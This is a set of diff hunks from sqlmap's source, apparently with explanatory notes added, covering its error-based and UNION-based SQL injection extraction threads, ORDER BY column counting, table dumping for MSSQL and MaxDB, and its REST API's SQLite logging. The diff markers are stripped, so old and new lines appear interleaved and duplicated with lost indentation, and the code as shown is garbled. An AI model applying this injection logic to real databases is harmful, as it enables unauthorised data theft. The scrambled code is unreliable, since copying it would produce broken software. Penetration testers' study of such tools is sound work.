threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
value = _errorFields(expression, expressionFields, expressionFieldsList)
|
||||
|
||||
@@ -53,8 +53,8 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I)

if _orderByTest(1) and not _orderByTest(randomInt()):
infoMsg = "'ORDER BY' technique appears to be usable. "
@@ -105,10 +105,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
for count in xrange(lowerCount, upperCount + 1):
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar):
pages[count] = page
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
ratios.append(ratio)
min_, max_ = min(min_, ratio), max(max_, ratio)
items.append((count, ratio))
@@ -187,7 +187,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
@@ -209,7 +209,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")

if not all(_ in content for _ in (phrase, phrase2)):
@@ -222,7 +222,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)

# Perform the request
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
payload, True) or "")
@@ -81,7 +81,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
payload = agent.payload(newValue=query, where=where)

# Perform the request
page, headers = Request.queryPage(payload, content=True, raise404=False)
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

incrementCounter(PAYLOAD.TECHNIQUE.UNION)
@@ -284,126 +284,127 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
dataToStdout("%s\n" % status)
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
output = _oneShotUnionUse(expression, unpack)
|
||||
|
||||
@@ -70,7 +70,7 @@ class Database(object):
self.cursor = None

def connect(self, who="server"):
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None)
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)
self.cursor = self.connection.cursor()
logger.debug("REST-JSON API %s connected to IPC database" % who)
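check_same_thread=False lifts sqlite3's default rule that a connection may only be used from the thread that created it, presumably because the REST-JSON API ends up touching the IPC connection from more than one thread; callers still have to serialize access themselves. A minimal standalone sketch of the flag's effect (file name and table are illustrative):

    import sqlite3
    import threading

    conn = sqlite3.connect("ipc.db", timeout=3, isolation_level=None, check_same_thread=False)
    conn.execute("CREATE TABLE IF NOT EXISTS logs(id INTEGER PRIMARY KEY, message TEXT)")
    lock = threading.Lock()

    def worker(msg):
        # without check_same_thread=False this execute() raises sqlite3.ProgrammingError,
        # because the connection was created in the main thread
        with lock:
            conn.execute("INSERT INTO logs(message) VALUES(?)", (msg,))

    t = threading.Thread(target=worker, args=("hello from a worker thread",))
    t.start()
    t.join()
    print(conn.execute("SELECT COUNT(*) FROM logs").fetchone()[0])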
@@ -232,34 +232,26 @@ class StdDbOut(object):
|
||||
# Ignore all non-relevant messages
|
||||
return
|
||||
|
||||
output = conf.databaseCursor.execute(
|
||||
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
|
||||
(self.taskid, content_type))
|
||||
output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type))
|
||||
|
||||
# Delete partial output from IPC database if we have got a complete output
|
||||
if status == CONTENT_STATUS.COMPLETE:
|
||||
if len(output) > 0:
|
||||
for index in xrange(len(output)):
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
|
||||
(output[index][0],))
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type, jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
if kb.partRun:
|
||||
kb.partRun = None
|
||||
|
||||
elif status == CONTENT_STATUS.IN_PROGRESS:
|
||||
if len(output) == 0:
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type,
|
||||
jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
else:
|
||||
new_value = "%s%s" % (dejsonize(output[0][2]), value)
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
(jsonize(new_value), output[0][0]))
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0]))
|
||||
else:
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
(self.taskid, str(value) if value else ""))
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else ""))
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
@@ -270,17 +262,13 @@ class StdDbOut(object):
|
||||
def seek(self):
|
||||
pass
|
||||
|
||||
|
||||
class LogRecorder(logging.StreamHandler):
|
||||
def emit(self, record):
|
||||
"""
|
||||
Record emitted events to IPC database for asynchronous I/O
|
||||
communication with the parent process
|
||||
"""
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
(conf.taskid, time.strftime("%X"), record.levelname,
|
||||
record.msg % record.args if record.args else record.msg))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg))
|
||||
|
||||
def setRestAPILog():
|
||||
if conf.api:
|
||||
@@ -555,16 +543,11 @@ def scan_data(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all data from the IPC database for the taskid
|
||||
for status, content_type, value in DataStore.current_db.execute(
|
||||
"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
json_data_message.append(
|
||||
{"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
|
||||
# Read all error messages from the IPC database
|
||||
for error in DataStore.current_db.execute(
|
||||
"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_errors_message.append(error)
|
||||
|
||||
logger.debug("[%s] Retrieved scan data and error messages" % taskid)
|
||||
@@ -591,10 +574,7 @@ def scan_log_limited(taskid, start, end):
    end = max(1, int(end))

    # Read a subset of log messages from the IPC database
    for time_, level, message in DataStore.current_db.execute(
            ("SELECT time, level, message FROM logs WHERE "
             "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"),
            (taskid, start, end)):
    for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):
        json_log_messages.append({"time": time_, "level": level, "message": message})

    logger.debug("[%s] Retrieved scan log messages subset" % taskid)

@@ -613,8 +593,7 @@ def scan_log(taskid):
        return jsonize({"success": False, "message": "Invalid task ID"})

    # Read all log messages from the IPC database
    for time_, level, message in DataStore.current_db.execute(
            "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
    for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
        json_log_messages.append({"time": time_, "level": level, "message": message})

    logger.debug("[%s] Retrieved scan log messages" % taskid)
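Note: scan_log_limited() serves log rows by id range, so a client can tail a running scan instead of re-fetching the whole log. A sketch of that incremental polling loop follows; the /scan/<taskid>/log/<start>/<end> path and the "log" response key are assumptions following the handler signature above.

import json
import time

try:
    from urllib.request import urlopen  # Python 3
except ImportError:
    from urllib2 import urlopen  # Python 2

REST_API = "http://127.0.0.1:8775"   # assumed sqlmapapi listen address
taskid = "0123456789abcdef"          # hypothetical task identifier
last_id = 0

while True:
    # Request only the log rows not seen yet (ids are 1-based and contiguous)
    url = "%s/scan/%s/log/%d/%d" % (REST_API, taskid, last_id + 1, last_id + 100)
    reply = json.loads(urlopen(url).read().decode("utf-8"))
    messages = reply.get("log", [])

    for entry in messages:
        print("%(time)s [%(level)s] %(message)s" % entry)

    last_id += len(messages)
    if not messages:
        time.sleep(1)  # nothing new yet; poll again shortly (Ctrl+C to stop)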
@@ -170,18 +170,44 @@ class Entries:
    if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
        table = "%s.%s" % (conf.db, tbl)

        try:
            retVal = pivotDumpTable(table, colList, blind=False)
        except KeyboardInterrupt:
            retVal = None
            kb.dumpKeyboardInterrupt = True
            clearConsoleLine()
            warnMsg = "Ctrl+C detected in dumping phase"
            logger.warn(warnMsg)
        if Backend.isDbms(DBMS.MSSQL):
            query = rootQuery.blind.count % table
            query = agent.whereQuery(query)

        if retVal:
            entries, _ = retVal
            entries = zip(*[entries[colName] for colName in colList])
            count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
            if isNumPosStrValue(count):
                try:
                    indexRange = getLimitRange(count, plusOne=True)

                    for index in indexRange:
                        row = []
                        for column in colList:
                            query = rootQuery.blind.query3 % (column, column, table, index)
                            query = agent.whereQuery(query)
                            value = inject.getValue(query, blind=False, time=False, dump=True) or ""
                            row.append(value)

                        entries.append(row)

                except KeyboardInterrupt:
                    kb.dumpKeyboardInterrupt = True
                    clearConsoleLine()
                    warnMsg = "Ctrl+C detected in dumping phase"
                    logger.warn(warnMsg)

        if not entries and not kb.dumpKeyboardInterrupt:
            try:
                retVal = pivotDumpTable(table, colList, blind=False)
            except KeyboardInterrupt:
                retVal = None
                kb.dumpKeyboardInterrupt = True
                clearConsoleLine()
                warnMsg = "Ctrl+C detected in dumping phase"
                logger.warn(warnMsg)

            if retVal:
                entries, _ = retVal
                entries = zip(*[entries[colName] for colName in colList])
    else:
        query = rootQuery.inband.query % (colString, conf.db, tbl)
elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB):
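Note: both the row-wise branch and the pivotDumpTable() fallback above end by turning a column-keyed mapping into row tuples with zip(*...). A small stand-alone illustration of that transpose step, with made-up column names and values:

# pivotDumpTable() returns a mapping of column name -> list of values;
# the dumping code wants one tuple per table row instead.
colList = ["id", "name"]
entries = {"id": ["1", "2", "3"], "name": ["luther", "fluffy", "wu"]}

rows = zip(*[entries[colName] for colName in colList])

for row in list(rows):
    print(row)
# ('1', 'luther')
# ('2', 'fluffy')
# ('3', 'wu')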
@@ -191,7 +217,7 @@ class Entries:

        query = agent.whereQuery(query)

        if not entries and query:
        if not entries and query and not kb.dumpKeyboardInterrupt:
            try:
                entries = inject.getValue(query, blind=False, time=False, dump=True)
            except KeyboardInterrupt:
@@ -285,17 +311,44 @@ class Entries:
    elif Backend.isDbms(DBMS.MAXDB):
        table = "%s.%s" % (conf.db, tbl)

        try:
            retVal = pivotDumpTable(table, colList, count, blind=True)
        except KeyboardInterrupt:
            retVal = None
            kb.dumpKeyboardInterrupt = True
            clearConsoleLine()
            warnMsg = "Ctrl+C detected in dumping phase"
            logger.warn(warnMsg)
        if Backend.isDbms(DBMS.MSSQL):
            try:
                indexRange = getLimitRange(count, plusOne=True)

        if retVal:
            entries, lengths = retVal
                for index in indexRange:
                    for column in colList:
                        query = rootQuery.blind.query3 % (column, column, table, index)
                        query = agent.whereQuery(query)

                        value = inject.getValue(query, union=False, error=False, dump=True) or ""

                        if column not in lengths:
                            lengths[column] = 0

                        if column not in entries:
                            entries[column] = BigArray()

                        lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))
                        entries[column].append(value)

            except KeyboardInterrupt:
                kb.dumpKeyboardInterrupt = True
                clearConsoleLine()
                warnMsg = "Ctrl+C detected in dumping phase"
                logger.warn(warnMsg)

